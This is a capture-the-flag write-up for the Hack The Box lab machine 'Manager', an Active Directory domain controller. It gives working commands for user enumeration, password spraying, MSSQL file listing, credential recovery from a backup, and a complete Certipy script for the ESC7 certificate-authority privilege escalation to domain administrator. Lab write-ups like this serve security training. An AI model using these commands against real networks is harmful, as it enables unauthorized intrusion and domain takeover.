Manager
Created by Geiseric
The following post by 0xb0b is licensed under CC BY 4.0
Recon
The target host has multiple open ports indicating a Windows environment, including services such as DNS, web hosting with Microsoft IIS, Active Directory LDAP, Microsoft SQL Server 2019, RPC services, and others, suggesting potential avenues for further exploration and exploitation. We are dealing with a domain controller and received the domain and computer name from the Nmap scan:
manager.htb
dc01.manager.htb
ports=$(nmap -p- --min-rate=1000 -T4 manager.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports manager.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 08:38 EDT
Nmap scan report for manager.htb (10.129.120.237)
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-16 19:38:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.120.237:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.120.237:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-16T19:30:16
|_Not valid after: 2054-03-16T19:30:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49693/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49694/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
52872/tcp open msrpc Microsoft Windows RPC
52918/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m50s, deviation: 0s, median: 6h59m49s
| smb2-time:
| date: 2024-03-16T19:39:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.94 second
When enumerating the website, nothing could be detected apart from static web pages.

We are probably dealing with an active directory challenge. We can enumerate some users using Kerbrute. For this, we use the xato-net-10-million-usernames.txt
from SecLists.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ ./kerbrute_linux_amd64 userenum -d manager.htb /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt --dc dc01.manager.htb

Initial Foothold
We use the output to create a user list.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ sed -n 's/.*:\s*\([^@]\+\)@manager\.htb.*/\1/p' kerbrute-results.txt > usernames.txt
ryan
guest
cheng
raven
administrator
Ryan
Raven
operator
Guest
Administrator
Cheng
jinwoo
RYAN
RAVEN
GUEST
Operator
Next, we try a password spray on the SMB port. We do this with the help of NetExec. We will also use the usernames as the password list. Maybe a user has used his username as a password. We issue the parameter --no-brute
only to insert the password as the username. We have a hit for the user operator
.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ nxc smb manager.htb -u usernames.txt -p usernames.txt --no-brute --continue-on-success

Let's see if we can use the credentials found to operate other services in addition to SMB. We can log in to the MSSQL service.
┌──(0xb0b㉿kali)-[~/Documnts/htb-app/manager]
└─$ mssqlclient.py manager.htb/operator:operator@manager.htb -windows-auth

We can use xp_dirtree
to display the folders and files on the system. In the wwwroot
folder, we find the web.config and a backup zip.
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;

Unfortunately, the web.config
, which is a common location for stored credentials, cannot be retrieved directly. But the backup.

In the backup, we find an old config, and this contains the credentials for the user raven
.

Using Evil-WinRM we can log in to the system and find the user flag on the user's desktop.

Privilege Escalation
We use Certipy to find a vulnerable configuration for ADCS.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ certipy find -u raven@manager -p '<REDACTED>' -dc-ip 10.129.120.237 -vulnerable

We see that raven has dangerous permissions that allow the ESC7 attack.

A detailed explanation of the attack can be found here:
To issue the attack we place the commands in a simple script, since they have to be issued very quickly in succession. You have to set the password, and if already requests were made the request_id has to be adjusted.
#!/bin/bash
# Set variables
CA='manager-DC01-CA'
USERNAME='raven@manager.htb'
PASSWORD='REDACTED'
TARGET='manager.htb'
REQUEST_ID='13'
# Command 1: Add officer
certipy ca -ca "$CA" -add-officer raven -username "$USERNAME" -password "$PASSWORD" &&
# Command 2: Enable template
certipy ca -ca "$CA" -enable-template SubCA -username "$USERNAME" -password "$PASSWORD" &&
# Command 3: Request
certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -template SubCA -upn administrator@manager.htb &&
# Command 4: Issue request
certipy ca -ca "$CA" -issue-request "$REQUEST_ID" -username "$USERNAME" -password "$PASSWORD" &&
# Command 5: Retrieve
certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -retrieve "$REQUEST_ID"
By executing the script we get the Administrator certificate

With that, we can retrieve the admin hash. The next commands have to be queued in quick succession and might fail. We have to synchronize our time with the DC.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager/certipy]
└─$ sudo ntpdate -s manager.htb && certipy auth -pfx administrator.pfx

We use Evil-WinRM to login as the Administrator by passing the retrieved hash. On the Desktop of the administrator, we find the final flag.

Last updated
Was this helpful?